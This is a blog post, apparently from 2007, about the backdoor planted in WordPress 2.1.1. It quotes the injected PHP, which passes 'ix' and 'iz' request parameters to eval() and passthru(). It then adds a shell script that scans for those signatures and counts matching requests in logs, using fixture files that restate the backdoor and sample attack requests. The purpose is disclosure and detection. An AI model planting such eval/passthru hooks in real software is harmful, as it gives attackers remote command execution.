What is this shit? A joke? It’s not funny!
// from wp-includes/feed.php
// backdoor: eval()s attacker-supplied PHP taken straight from the "ix" query parameter
function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
// [...]
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
// from wp-includes/theme.php
// backdoor: runs an attacker-supplied shell command taken from the "iz" query parameter
function get_theme_mcommand($mcds) {
passthru($mcds);
}
// [...]
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
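Two checks a practitioner would want after reading the snippet above: does my WordPress tree contain the injected functions, and did anyone already send requests carrying the ix= or iz= parameters? The script below is an added example, not code from the post or from WordPress; the fixture files, the access-log lines and the temp-dir layout it builds are constructed for the demo, and the signature regex is derived only from the lines quoted above.

```sh
#!/bin/sh
# Added example (not from the original post): two checks for the backdoor
# shown above. All paths, log lines and fixture files below are constructed
# for the demo; point the functions at a real WordPress tree and access log.

# Signatures of the injected code: the two bogus function names and the
# eval()/passthru() sinks they wrap. Legitimate WordPress code never calls
# eval() on a request parameter, so any hit deserves a look.
BACKDOOR_RE='comment_text_phpfilter|get_theme_mcommand|eval\(\$filterdata\)|passthru\(\$mcds\)'

# scan_wp_tree DIR: print file:line for every signature hit under DIR.
# Exit 0 when something was found, 1 when the tree looks clean.
scan_wp_tree() {
    hits=$(grep -rnE --include='*.php' "$BACKDOOR_RE" "$1" 2>/dev/null || true)
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# count_backdoor_requests LOG: number of request lines whose query string
# carries the backdoor's ix= or iz= parameter (common/combined log format).
# "?index=1" or "&mix=2" do not match: the parameter name must follow ? or &.
count_backdoor_requests() {
    grep -cE '"(GET|POST|HEAD) [^" ]*[?&]i[xz]=' "$1" || true
}

# make_fixtures: build a constructed backdoored tree, a clean tree and a
# constructed access log in a temp dir; print the temp dir path.
make_fixtures() {
    fx=$(mktemp -d)
    mkdir -p "$fx/backdoored/wp-includes" "$fx/clean/wp-includes"
    # The injected lines, as quoted in the post above.
    cat > "$fx/backdoored/wp-includes/feed.php" <<'EOF'
<?php
function comment_text_phpfilter($filterdata) {
    eval($filterdata);
}
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
EOF
    cat > "$fx/backdoored/wp-includes/theme.php" <<'EOF'
<?php
function get_theme_mcommand($mcds) {
    passthru($mcds);
}
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
EOF
    # A harmless file that mentions themes and reads $_GET legitimately.
    cat > "$fx/clean/wp-includes/theme.php" <<'EOF'
<?php
function get_theme_name($default) { return htmlspecialchars(isset($_GET["theme"]) ? $_GET["theme"] : $default); }
EOF
    # Constructed access log: lines 2 and 3 hit the backdoor, 1 and 4 do not.
    cat > "$fx/access.log" <<'EOF'
10.0.0.1 - - [02/Mar/2007:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.2 - - [02/Mar/2007:12:00:05 +0000] "GET /wp-includes/feed.php?ix=phpinfo%28%29%3B HTTP/1.1" 200 512 "-" "curl/7.15"
10.0.0.3 - - [02/Mar/2007:12:00:09 +0000] "GET /wp-includes/theme.php?iz=id HTTP/1.1" 200 64 "-" "Wget/1.10"
10.0.0.4 - - [02/Mar/2007:12:00:11 +0000] "GET /?index=1&mix=2 HTTP/1.1" 200 1000 "-" "Mozilla/5.0"
EOF
    printf '%s\n' "$fx"
}

# Demo run: scan both constructed trees and count suspicious requests.
FX=$(make_fixtures)
echo "== backdoored tree =="
scan_wp_tree "$FX/backdoored" || echo "(no hits)"
echo "== clean tree =="
scan_wp_tree "$FX/clean" || echo "(no hits)"
echo "== suspicious requests in access.log: $(count_backdoor_requests "$FX/access.log")"
```

On a real server, run scan_wp_tree against the document root and count_backdoor_requests against each rotated access log; a non-zero request count means the backdoor was not just present but used, which turns "patch it" into "treat the host as compromised".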
Why do we always have to wait for things like these to happen before we take even the most basic security measures!
I’m aware that this is a complicated matter, but we can’t just take chances like that!!!! Or can we?
I love WordPress, but this is just too big. I am also wondering why the message on wordpress.org didn't mention what seems to me like a quick patch, that is, commenting out the two if statements above (wp-includes/feed.php, line 149; wp-includes/theme.php, line 441; at least on my 2.1.1 installation).
Let’s see the official advisories. Why aren’t there any yet? A message from BugTraq is all I could find.
Quick, go fix it!!!
cat >/dev/null is 